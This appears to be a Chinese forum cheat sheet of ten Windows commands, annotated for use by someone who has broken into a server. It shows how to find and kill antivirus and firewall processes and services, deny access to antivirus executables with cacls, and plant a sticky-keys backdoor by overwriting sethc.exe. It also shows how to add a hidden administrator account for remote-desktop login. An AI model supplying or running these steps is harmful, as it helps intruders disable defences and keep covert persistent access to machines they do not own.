1.ver
作用:查看系统版本
实例:ver
2.tasklist
作用:列出机器的所有进程
实例:tasklist
说明:用它你就可以知道机器的杀毒软件、防火墙
3.taskkill
作用:杀制定名字或者pid的进程
实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389
说明:使用它可以结束防火墙进程。
4.net start
作用:列出机器所有服务或者启动某个指定的服务
实例: net start 或者 net start w3svc(启动iis)
说明:通过它列出的所有服务可以看到服务器安装的杀毒软件,以及开放哪些服务。比如有瑞星服务,则你单独用taskkill是无法结束杀毒进程的,只能先停止服务。
比如有 Terminal Services则可以通过net u_ser(_去掉,因为华夏屏蔽)增加一个帐号,再3389登陆。
5.net stop
作用:停止指定的服务
格式:net stop "服务名"
实例: net stop sharedaccess (停止windows防火墙)
说明:结合net start使用
6.cacls
作用:设置文件权限
实例: cacls c:/windows/mm.exe /P everyone:R 或者cacls c:/progra~1/rising/ravmond.exe /d:everyone
设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀木马或者免疫:可参看http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html )
7.&
作用:连续执行多个命令
实例:del c:/windows/system32/sethc.exe & del c:/windows/system32/dllcache/sethc.exe & copy c:/windows/explorer.exe c:/windows/system32/dllcache/sethc.exe & copy c:/windows/explorer.exe c:/windows/system32/sethc.exe
8.echo y|Smowu
作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n)
实例:echo y>echo y>cacls c:/windows/mm.exe /P everyone:R;
说明:将上面shift按多次后门简化:echo y | copy c:/windows/explorer.exe c:/windows/system32/dllcache/sethc.exe & echo y | copy c:/windows/explorer.exe c:/windows/system32/sethc.exe
(直接拷贝的时候会提示是否覆盖,这儿通过echo y解决)
9.net us_er/group(_去掉,因为华夏屏蔽)
作用:开帐号,并加入到组(一般是administrators组)
实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add
说明:以上通过 &操作符又是一步到位。另外,通过这种方法建立的帐号,仅一次隐藏。如长期隐藏,可参考:http://hi.baidu.com /it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html
10.shutdown
作用:重启或者关闭机器,或者取消关机
实例:shutdown -r -t 0(立即重启)
以上命令有些2000下可能无法运行,xp,2003下肯定ok。